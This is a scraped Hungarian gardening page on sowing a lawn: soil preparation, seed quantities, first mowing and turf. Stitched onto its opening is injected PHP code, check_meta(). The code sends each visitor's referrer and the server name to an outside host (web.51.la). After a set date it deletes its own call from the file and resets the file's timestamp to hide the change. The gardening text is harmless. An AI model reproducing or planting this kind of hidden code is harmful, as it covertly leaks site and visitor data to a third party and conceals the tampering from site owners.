check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735622){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776892&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_feed/mode.php"); } Hogyan füvesítsünk?

Hogyan füvesítsünk?

 

A gyepesítés előtt minden esetben a talajra jó minőségű termőföldet, vagy komposztot szórjunk szét, legalább egy vödörnyit egy négyzetméteren. A komposzt kiszórása után ássuk fel mélyen a talajt, vagy rotációs kapával forgassuk meg. A meglazított területet gyephengerrel, vagy lábunkra erősített deszkalapokkal egyengessük el. A kisebb egyenetlenségeket gereblyével, vagy lapáttal tüntethetjük el. A fűmagot csak a sík talajra juttassuk ki, mert a fű fényen csírázó mag, amennyiben a helytelen öntözés vagy az eső bemossa a laza talajba nagy százaléka nem fog kikelni. Négyzetméterenként 30-35 g magot kell kiszórni. A fűmagkeverék sem mindegy milyen minőségű. Attól függően, hogy milyen gyakran szeretnénk nyírni, milyen sűrű gyepet szeretnénk és milyen nagy igénybevételnek lesz kitéve. Sokféle összetételből választhatunk ennek megfelelően. Figyelem! A fűre lépni tilos! Legalábbis mindaddig, amíg a fő fűfajok meg nem erősödtek, ne lépjünk a telepített gyepre, mert foltos lesz és csak nagyon lassan fog helyreállni a kitaposott rész. A gyorsan kelő csokros növekedésű fűfajokat felváltják a tarackoló gyökerű szívósabb fajok, melyek kb. 2 hónap alatt már megerősödnek, és így használhatóvá válik a gyepünk. Természetesen mind a két fajra szükségünk lehet, mert a gyorsan növekvő fajok megteremtik a megfelelő mikroklímát a szívósabb fajok számára, nem vásárolhatunk csak tarackoló gyökerű fűmagokat, mert a kelés vontatott és hiányos lesz. A kikelt füvet hagyjuk egy ideig nőni, majd amikor elérte a 7-10 cm-es magasságot, nyírjuk le, de úgy, hogy minél kisebb mértékben tapossuk a talajt. Ezután a gyep sűrűsödése következik, néhány hónapon belül, ha az öntözésre és a tápanyag utánpótlásra odafigyelünk, olyan pázsitot kapunk, mintha gyepszőnyeggel telepítettük volna a kertünket. A fűmag vetésénél sokkal gyorsabb módszer a gyepszőnyeg telepítése, még ha költségesebb is, rögtön elkészül és megfelelő fenntartás mellett nem gyomosodik be.

 

 
Ugrás a lap tetejére

 


 Automata öntözőrendszer  | Öntözés  | Öntözéstechnika | Kertépítés | Füvesítés |  Kerttervezés  | Gyepszőnyeg | Gyeptrágya | Kerti tó | Sziklakert  | Szivattyú